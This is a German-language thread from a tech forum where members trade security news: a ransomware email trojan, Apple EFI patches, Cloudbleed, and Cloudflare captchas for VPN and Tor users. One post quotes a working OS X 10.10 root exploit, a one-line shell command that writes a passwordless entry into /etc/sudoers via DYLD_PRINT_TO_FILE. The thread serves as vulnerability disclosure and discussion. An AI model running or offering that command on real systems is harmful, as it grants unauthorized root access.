"Christmas - the time to fix the computers of your loved ones" « Lord Wyrm

Aktuelle Sicherheitslücken

Hansmaulwurf 20.04.2014 - 11:17 91197 261 Thread rating
Posts

mr.nice.

Moderator
Avatar
Registered: Jun 2004
Location: Wien
Posts: 5185
Momentan ist verstärkt im deutschsprachigen Raum ein Ransomware Trojaner im Umlauf dessen Erkennungsrate noch relativ niedrig ist, meist als Email-Attachment getarnt:

https://www.virustotal.com/de/file/...b76e8/analysis/

noir

Overclocking Team Member
Avatar
Registered: Dec 2007
Location: Salzburg/OÖ
Posts: 2248
naja
Ausgleich von Inkassoabteilung --> hääääää
sowas landet bei mir sowieso sofort im Kübel
wenn es überhaupt durch den Spamfilter durchgeht

mr.nice.

Moderator
Avatar
Registered: Jun 2004
Location: Wien
Posts: 5185
Apple EFI-Update schließt Sicherheitslücken CVE-2015-3692, CVE-2015-3693:

https://support.apple.com/de-de/HT204934

Luka

Administrator
...
Avatar
Registered: Nov 2006
Location: Mödling
Posts: 206

So einfach bekommt man Root-Rechte auf OS X 10.10:

Zitat
echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s

Quelle: numinit auf reddit.com

Luka

Administrator
...
Avatar
Registered: Nov 2006
Location: Mödling
Posts: 206

wergor

I like open source
Avatar
Registered: Jul 2005
Location: graz
Posts: 3757

Lord Wyrm

topquote owner since '17
Avatar
Registered: Jan 2005
Location: wean
Posts: 1258
Cloudbleed




Wiedermal Zeit für nen Passwortwechsel...

Rektal

Here to stay
Registered: Dec 2002
Location: Inside
Posts: 4363
Zitat
Cloudbleed

Das ist wirklich einer der besten Internet-Bugs seit langem:
- zentral genutzes Service
- broken html parsing gepaart mit buffer overrun/memory leak
- leaks private information on random unrelated requests
- gets data cached on the internets (google, etc.)

Perfekt, besser gehts nicht :bash:

COLOSSUS

# pkill -9 .
Avatar
Registered: Dec 2000
Location: Wien || Stmk
Posts: 11119
¯\_(ツ)_/¯

Obermotz

Fünfzylindernazi
Avatar
Registered: Nov 2002
Location: OÖ/RI
Posts: 5201
Die gehn ma eh schon lange aufn Sack mit ihren deppterten DDOS ReCaptcha Abfragen wenn ich via VPN unterwegs bin..

Smut

takeover & ether
Avatar
Registered: Feb 2003
Location: VIE
Posts: 15800
in deinem fall würd ich dann aber auch zu einem anderen VPN anbieter raten :p
hat schon einen grund weshalb das kommt.

ja, bitter. incident response machen sie dennoch vorbildlich.

Obermotz

Fünfzylindernazi
Avatar
Registered: Nov 2002
Location: OÖ/RI
Posts: 5201
Naja viele Anbieter sind mittlerweile gelistet. Hab eh schon einige durch ;)

wergor

I like open source
Avatar
Registered: Jul 2005
Location: graz
Posts: 3757
Zitat von Smut
in deinem fall würd ich dann aber auch zu einem anderen VPN anbieter raten :p
hat schon einen grund weshalb das kommt.
mit tor gibts auch ständig captcha abfragen. nervt leider :(

Zitat von Smut
ja, bitter. incident response machen sie dennoch vorbildlich.
true, der report ist auch sehr interessant zu lesen, auch wenn man (wie ich) mit nginx und ragel nix am hut hat.

edit: der einzige für mich relevante anbeiter den ich bis jetzt gefunden habe ist humblebundle.com :/

Smut

takeover & ether
Avatar
Registered: Feb 2003
Location: VIE
Posts: 15800
das problem dabei ist halt, dass der website-provider genau diesen schutz vor anonymen angreifern will, wenn er seine seite hinter cloudflare bringt. hat jetzt wenig damit zu tun, dass du VPN verwendest sondern, dass von diesen adressen (auch tor exit nodes) vermehrt automatisierte attacken auf das cloudflare CDN losgehen. und um diese automatismen zu unterbinden haben sie captchas.

wergor

I like open source
Avatar
Registered: Jul 2005
Location: graz
Posts: 3757
das ist mir schon klar. nervt aber trotzdem ;)
Kontakt | Unser Forum | Über overclockers.at | Impressum | Datenschutz